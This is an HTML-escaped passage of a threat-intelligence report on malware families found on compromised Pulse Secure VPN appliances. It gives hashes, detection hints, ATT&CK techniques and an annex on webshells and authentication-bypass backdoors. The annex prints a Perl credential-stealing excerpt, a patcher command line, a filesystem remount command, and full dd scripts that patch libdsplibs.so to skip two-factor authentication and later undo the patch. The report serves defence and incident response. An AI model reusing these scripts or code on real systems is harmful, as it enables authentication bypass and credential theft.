style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eHTTP_X_CNT\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u0026lt;RC4Key\u0026gt;\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:43.0481%\"\u003e\n\u003cp\u003eHTTP_X_CMD\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:56.9519%\"\u003e\n\u003cp\u003e\u0026lt;RC4Command\u0026gt;\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u00a0\u003c/div\u003e\n\u003c/div\u003e\n\u003cp\u003e1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSLOWPULSE VARIANT 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\\n.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePACEMAKER is saved at filepath /home/bin/memread\u003c/li\u003e\n\u003cli\u003eExecuted with commandline flags \u2013t, -m, -s\u003c/li\u003e\n\u003cli\u003eAttaches to victim processes with PTRACE and opens subfiles in /proc/\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTHINBLOOD creates the 
files:\r\n\u003cul\u003e\n\u003cli\u003e/home/runtime/logs/log.events.vc1\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.events.vc2\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.access.vc1\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.access.vc2\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eExecutes the system API with the mv command specifying one of the files above, targeting:\r\n\u003cul\u003e\n\u003cli\u003e/home/runtime/logs/log.access.vc0\u003c/li\u003e\n\u003cli\u003e/home/runtime/logs/log.events.vc0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eExecutes the rm command specify one of the .vc1 files above\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSLIGHTPULSE uses /tmp/1 as command execution log\u003c/li\u003e\n\u003cli\u003eAll POST requests to meeting_testjs.cgi are suspicious\u003c/li\u003e\n\u003cli\u003ePOST parameters: cert, img, name are used by malicious logic\u003c/li\u003e\n\u003cli\u003eResponses to the endpoint with the name parameter respond with no-cache and image/gif\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTHINBLOOD execution of sed on the files:\r\n\u003cul\u003e\n\u003cli\u003elog.events.vc0\u003c/li\u003e\n\u003cli\u003elog.access.vc0\u003c/li\u003e\n\u003cli\u003eLog.admin.vc0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSed patterns used:\r\n\u003cul\u003e\n\u003cli\u003es/.\\x00[^\\x00]*[^\\x00]*\\x09.\\x00//g\u003c/li\u003e\n\u003cli\u003es/\\x\\x00[^\\x00]*[^\\x00]*\\x09\\x\\x00//g\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sample accepts an input and output file as its first and second 
arguments, then writes a patched version of the input out. The commandline argument e or E must be supplied as the fourth argument. Example command line:\r\n\u003cul\u003e\n\u003cli\u003e./patcher input.bin output.bin backdoorkey e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ef2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sample uses the HTTP query parameter id and responds with HTTP headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450\u003c/p\u003e\n\u003cp\u003e64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7\u003c/p\u003e\n\u003cp\u003e78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282\u003c/p\u003e\n\u003cp\u003e705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eExecute sed on PulseSecure system files\u003c/li\u003e\n\u003cli\u003eRemounts filesystem as writable: system(\"/bin/mount -o remount,rw /dev/root /\")\u003c/li\u003e\n\u003cli\u003eUnexpected execution of other system commands such as tar, cp, rm\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eMITRE ATT\u0026amp;CK Techniques\u003c/h4\u003e\n\u003cp\u003eThe following list of MITRE ATT\u0026amp;CK techniques cover all malware samples described in this report as well as those observed throughout the lifecycle of UNC2630 and UNC2717.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eT1003-OS Credential Dumping\u003c/li\u003e\n\u003cli\u003eT1016-System Network Configuration Discovery\u003c/li\u003e\n\u003cli\u003eT1021.001-Remote Desktop Protocol\u003c/li\u003e\n\u003cli\u003eT1027-Obfuscated Files or Information\u003c/li\u003e\n\u003cli\u003eT1036.005-Match Legitimate Name or Location\u003c/li\u003e\n\u003cli\u003eT1048-Exfiltration Over Alternative 
Protocol\u003c/li\u003e\n\u003cli\u003eT1049-System Network Connections Discovery\u003c/li\u003e\n\u003cli\u003eT1053-Scheduled Task/Job\u003c/li\u003e\n\u003cli\u003eT1057-Process Discovery\u003c/li\u003e\n\u003cli\u003eT1059-Command and Scripting Interpreter\u003c/li\u003e\n\u003cli\u003eT1059.003-Windows Command Shell\u003c/li\u003e\n\u003cli\u003eT1070-Indicator Removal on Host\u003c/li\u003e\n\u003cli\u003eT1070.001-Clear Windows Event Logs\u003c/li\u003e\n\u003cli\u003eT1070.004-File Deletion\u003c/li\u003e\n\u003cli\u003eT1071.001-Web Protocols\u003c/li\u003e\n\u003cli\u003eT1082-System Information Discovery\u003c/li\u003e\n\u003cli\u003eT1098-Account Manipulation\u003c/li\u003e\n\u003cli\u003eT1105-Ingress Tool Transfer\u003c/li\u003e\n\u003cli\u003eT1111-Two-Factor Authentication Interception\u003c/li\u003e\n\u003cli\u003eT1133-External Remote Services\u003c/li\u003e\n\u003cli\u003eT1134.001 Access Token Manipulation: Token Impersonation/Theft\u003c/li\u003e\n\u003cli\u003eT1136-Create Account\u003c/li\u003e\n\u003cli\u003eT1140-Deobfuscate/Decode Files or Information\u003c/li\u003e\n\u003cli\u003eT1190-Exploit Public-Facing Application\u003c/li\u003e\n\u003cli\u003eT1505.003-Web Shell\u003c/li\u003e\n\u003cli\u003eT1518-Software Discovery\u003c/li\u003e\n\u003cli\u003eT1554-Compromise Client Software Binary\u003c/li\u003e\n\u003cli\u003eT1556.004-Network Device Authentication\u003c/li\u003e\n\u003cli\u003eT1592.004 Gather Victim Host Information: Client Configurations\u003c/li\u003e\n\u003cli\u003eT1562 Impair Defenses\u003c/li\u003e\n\u003cli\u003eT1569.002-Service Execution\u003c/li\u003e\n\u003cli\u003eT1574 Hijack Execution Flow\u003c/li\u003e\n\u003cli\u003eT1600-Weaken Encryption\u003c/li\u003e\n\u003c/ul\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 6: MITRE ATT\u0026amp;CK 
Map\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png 1280w"," 1060px, 1280px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003ch4\u003eTechnical Annex\u003c/h4\u003e\n\u003ch5\u003eSLIGHTPULSE\u003c/h5\u003e\n\u003cp\u003eThe file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a webshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of legitimate logic to respond to POST requests. We believe this webshell may be responsible for placing additional webshells and used to modify legitimate system components resulting in the other observed malware families due to its functionality.\u003c/p\u003e\n\u003cp\u003eThe malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests expected of the legitimate code. If GET requests are performed the legitimate logic is still invoked. POST requests have a series of parameters checked for existence to determine which command to invoke. 
This logic is:\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003e\u003cstrong\u003ePOST params\u003c/strong\u003e\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003e\u003cstrong\u003eInvoked Command\u003c/strong\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003ecert\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003ewritefile\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eimg, name with nonempty value\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003ereadfile\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eimg set to empty string \"\", name\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003eexeccmd\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"border:1px solid 
#000000;padding:16px\"\u003eanything else\u003c/td\u003e\n\u003ctd style\u003d\"border:1px solid #000000;padding:16px\"\u003einvoke original legitimate logic\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e"]]],[null,null,null,null,null,null,null,null,[[[null,"\u003cp\u003eFigure 7: Webshells respond to POSTs\u003c/p\u003e"],["https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1100x1100.png 1060w, https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png 1254w"," 1060px, 1254px","https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png"],null,3]]],[null,null,[null,[null,"\u003cp\u003eAll incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The first six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended. This nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then used to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:\u003c/p\u003e\n\u003cp\u003eOutbound/Inbound:\u003c/p\u003e\n\u003cp\u003e\u0026lt;6randbytes\u0026gt;\u003cbr\u003e^-RC4NONCE-^\u003c/p\u003e\n\u003cp\u003eUsage:\u003c/p\u003e\n\u003cp\u003e\u0026lt;6randbytes\u0026gt;\u003cbr\u003e^-------RC4 KEY--------^\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eReadFile\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. 
The file contents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers \"Content-type: application/x-download\\n\", and form header \"Content-Disposition: attachment; filename\u003dtmp\\n\\n\".\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eWriteFile\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4 encrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file before the file is closed. The results of this command are sent back to the attacker, using the headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eExecute\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eThis command accepts a base64 encoded, RC4 encrypted commands via the name parameter. The malicious logic forbids the cd command and will respond with the text Error 404 if executed. All other commands will be executed via the system API with output piped to the file /tmp/1. The full system command is \u0026gt;/tmp/1 2\u0026gt;\u0026amp;1. The output of this execution is read and sent back to the attacker base64 encoded, RC4 encrypted. The headers \u0026quot;Cache-Control: no-cache\\n\u0026quot; and \u0026quot;Content-type: image/gif\\n\\n\u0026quot; are used. 
The response appears to be masquerading as a GIF when sending back this command output.\u003c/p\u003e\n\u003ch5\u003eRADIALPULSE\u003c/h5\u003e\n\u003cp\u003eThe file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified Perl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated with logins to this application to be written to the file /tmp/dsstartssh.statementcounters.\u003c/p\u003e\n\u003cp\u003eRetrieval of these login credentials must be achieved through other means such as an interactive login or a webshell. Persistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure webpage.\u003c/p\u003e\n\u003cp\u003eAn excerpt of the code related to credential stealing is shown as follows:\u003c/p\u003e\n\u003cp\u003emy $realmName1 \u003d $signin-\u0026gt;getRealmInfo()-\u0026gt;{name};\u003c/p\u003e\n\u003cp\u003eopen(*fd, \u0026quot;\u0026gt;\u0026gt;/tmp/dsstartssh.statementcounters\u0026quot;);\u003c/p\u003e\n\u003cp\u003esyswrite(*fd, \"realm\u003d$realmName1 \", 5000);\u003c/p\u003e\n\u003cp\u003esyswrite(*fd, \"username\u003d$username \", 5000);\u003c/p\u003e\n\u003cp\u003esyswrite(*fd, \"password\u003d$password\\n\", 5000);\u003c/p\u003e\n\u003cp\u003eclose(*fd);\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 1\u003c/h5\u003e\n\u003cp\u003eThe file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a trojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific authentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently subvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. 
If the backdoor password is not used, authentication will fail as normal.\u003c/p\u003e\n\u003cp\u003eIn multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very small, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding regions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all flags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able to execute and perform its malicious logic as a passive observer if desired, only effecting the control flow in specific conditions. This is employed in two locations, the LDAP and RADIUS authentication routines,\u00a0DSAuth::LDAPAuthServer::authenticate\u00a0and\u00a0DSAuth::RadiusAuthServer::checkUsernamePassword\u00a0respectively.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eLDAP Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIn the typical execution of\u00a0DSAuth::LDAPAuthServer::authenticate\u00a0the legitimate application constructs the C++ object\u00a0DSAuth::LDAPAuthServer::ldap\u00a0then passes it to\u00a0DSLdapServer::bind\u00a0with the username and password for login. This bind may fail or succeed which determines the authentication failure or success of the LDAP protocol. The malicious logic inserted into the application redirects execution before\u00a0DSLdapServer::bind\u00a0just after the ldap object is constructed. At this point in execution the username and password are easily extracted from memory with mid-function hooking techniques, which the sample copies to a code cave in memory between two functions as a temporary storage location. The malicious logic then invokes\u00a0DSLdapServer::bind\u00a0as the normal logic would, which sets the return register EAX to 0 or 1 for failure or success. 
A check is then executed where the temporary password copy made earlier is checked against a hardcoded backdoor password. If this check passes the backdoor logic actives by overwriting EAX to 1 to force the application down the execution path of successful authentication, even though in reality authentication failed.\u003c/p\u003e\n\u003ch5\u003eRADIUS Two Factor Auth Bypass\u003c/h5\u003e\n\u003cp\u003eIn the typical execution of\u00a0DSAuth::RadiusAuthServer::checkUsernamePassword\u00a0the legitimate application sends a RADIUS-2FA auth packet with username and password via\u00a0RadiusAuthPacket::sendRadiusPacket. The response is then retrieved and parsed by the routine\u00a0DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is verified to be 3, it's not known what this packet type specifies but this is the packet type of a successful authentication response. If the packet type check passes, then the sample reads a field of the packet that specifies if authentication was successful or not and then checks this status later. The inserted malicious logic hijacks execution just after\u00a0DSAuth::RadiusAuthServer::handleResponse\u00a0where the password sent to the RADIUS server is checked against a backdoor password. If this check passes the malicious logic overwrites the retrieved packet with values indicating that it's of type 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet type is checked. 
If written the spoofed values force the application down the execution path of successful authentication, even though in reality authentication failed.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 2\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Credential Logging\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eWe also identified a variant of SLOWPULSE (SHA256:\u00a01ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used during ACE-2FA protocol authentication.\u003c/p\u003e\n\u003cp\u003eThe backdoor is implemented in the routine\u00a0DSAuth::AceAuthServer::checkUsernamePassword. As part of the login procedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an unconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then writes them to the file\u00a0/home/perl/PAUS.pm\u00a0in\u00a0a+\u00a0(append) mode, using the format string\u00a0%s:%s\\n. The backdoor then unconditionally jumps back into the normal control flow to continue the logon process as normal.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 3\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eACE Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eWe Identified another variant of SLOWPULSE (SHA256:\u00a0b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE VARIANT 2 the malicious logic lives within\u00a0DSAuth::AceAuthServer::checkUsernamePassword, however this variant bypasses the logon procedure rather than login credentials. Typical execution of this routine calls\u00a0DsSecID_checkLogin\u00a0to validate the username and password which sets the EAX register to 1. The routine\u00a0DSAuth::AceAuthServer::handleACEAuthResult\u00a0then checks EAX to determine if auth was successful or not. 
The malicious logic hijacks execution immediately after the username and password fields are written to their map entries, then checks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten to 1. This puts the program in the same state as if\u00a0DsSecID_checkLogin\u00a0had successfully executed, but unlike SLOWPULSE VARIANT 1 the original authentication routine is not called at all. The malicious logic then rejoins execution before\u00a0DSAuth::AceAuthServer::handleACEAuthResult\u00a0which will now pass. This forces the application down the execution path of successful authentication, even though in reality authentication would have failed.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 4\u003c/h5\u003e\n\u003cp\u003e\u003cem\u003eRealmSignin Two Factor Auth Bypass\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eWe identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of the\u00a0DSAuth::RealmSignin\u00a0process. The backdoor is present within the function\u00a0DSAuth::RealmSignin::runSigninStep.This routine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of the switch statement typically calls the routines\u00a0DSMap::setPrivacyKeyNames\u00a0then\u00a0DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant overwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if DSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with these patches applied as the attacker removed their patches after use. However, we did uncover both the patcher and unpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. 
This analysis was performed by replaying the changes performed by the patcher we did recover.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 2 Patcher\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original\u00a0libdsplibs.so\u00a0file. The file with SHA256:\u00a0c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c\u00a0is responsible for inserting SLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments, the path to the original binary and the patched output file path. The original binary is read into memory, patched, and then written to the output path. The assembly patches and offsets into the original binary are hardcoded.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 3 Patcher\u003c/h5\u003e\n\u003cp\u003e\u00a0As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original\u00a0libdsplibs.so\u00a0file. The file with SHA256:\u00a006c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\u00a0is responsible for inserting SLOWPULSE V3 malicious logic to bypass ACE logon authentication process. The patcher accepts four arguments. The first argument is the original binary path, the second the patched output file path, third is the backdoor bypass password, and fourth is the letter e specifying to apply patches. The sample reads the original binary into memory, applies the assembly patches associated with SLOWPULSE V3, as well as the provided bypass password, then written to the output path. 
The assembly patches, and all offsets including where to copy the bypass password are hardcoded.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 4 Patcher\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious logic into the original\u00a0libdsplibs.so\u00a0file. The file with SHA256:\u00a0e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415\u00a0responsible for inserting the patch for SLOWPULSE V3. The patch applied overwrites a single call to\u00a0DSAuth::RealmSignin::runSecondaryAuth\u00a0with\u00a0mov eax, 1. This patcher utility is a simple bash script, unlike the previous patchers which were compiled applications likely written in C. The script in full is:\u003c/p\u003e\n\u003cp\u003eprintf '\\xB8' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B31))printf '\\x01' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B32))printf '\\x00' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B33))printf '\\x00' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B34))printf '\\x00' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B35))\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 4 UnPatcher\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove the malicious logic into the original\u00a0libdsplibs.so\u00a0file for SLOWPULSE V4. The attacker chose to remove the patches applied to\u00a0libdsplibs.so. The file with SHA256:\u00a0b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a\u00a0is the unpatcher utility for SLOWPULSE V4. 
This sample is also a simple bash script, in full it is:\u003c/p\u003e\n\u003cp\u003eprintf '\\xE8' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B31))printf '\\xE2' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B32))printf '\\x08' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B33))printf '\\xD0' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B34))printf '\\xFF' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B35))\u003c/p\u003e\n\u003ch5\u003eSTEADYPULSE\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0licenseserverproto.cgi\u00a0(SHA256:\u00a0168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a webshell implemented via modification of a legitimate Perl script used by a Pulse Secure tool which enables arbitrary command execution.\u003c/p\u003e\n\u003cp\u003eThe attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by comments that indicate the start and end of inserted code. The comment strings used are\u00a0##cgistart1,\u00a0##cgiend1,\u00a0##cgistart2\u00a0and\u00a0##cgiend2. Although the exact purpose of these comment strings is unknown, the attacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe Perl script enclosed in the tags\u00a0##cgistart1\u00a0and\u00a0##cgiend1\u00a0adds several lines to import Perl modules that are used by the webshell. It also adds a function to parse parameters of received command data.\u003c/li\u003e\n\u003cli\u003eThe script enclosed in the tags\u00a0##cgistart2\u00a0and\u00a0##cgiend2\u00a0is responsible for checking web requests designed to be executed by the webshell, if present. 
If no webshell request is found, the script passes execution to the legitimate Perl script for the webpage.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe webshell portion of the script is invoked when it receives a form submission\u00a0name\u003dvalue\u00a0pair of\u00a0serverid\u00a0matching a secret key. This causes the webshell to extract the string passed to it via the\u00a0QUERY_STRING\u00a0CGI environment variable. Individual key/value pairs delimited by the\u00a0\u0026amp;\u00a0character and are URL decoded. Although the script parses out all key/value pairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a form containing the extracted cmd to be executed and the previous\u00a0serverid\u00a0value along with a form submission button named\u00a0Run. Upon submission, the webshell will execute the passed command on the victim host\u0026#39;s command line and display the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output a\u00a0\u0026lt;/pre\u0026gt;\u00a0HTML tag.\u003c/p\u003e\n\u003ch5\u003ePULSECHECK\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0secid_canceltoken.cgi\u00a0(SHA256:\u00a0a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a webshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute webshell code. Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.\u003c/p\u003e\n\u003cp\u003eThe script checks for web requests using the HTTP\u00a0POST\u00a0method and, if found, will further check the HTTP request headers for the CGI environment variable\u00a0HTTP_X_KEY. If this header matches a backdoor key, then the malware will output the result of the command sent in the variable\u00a0HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. 
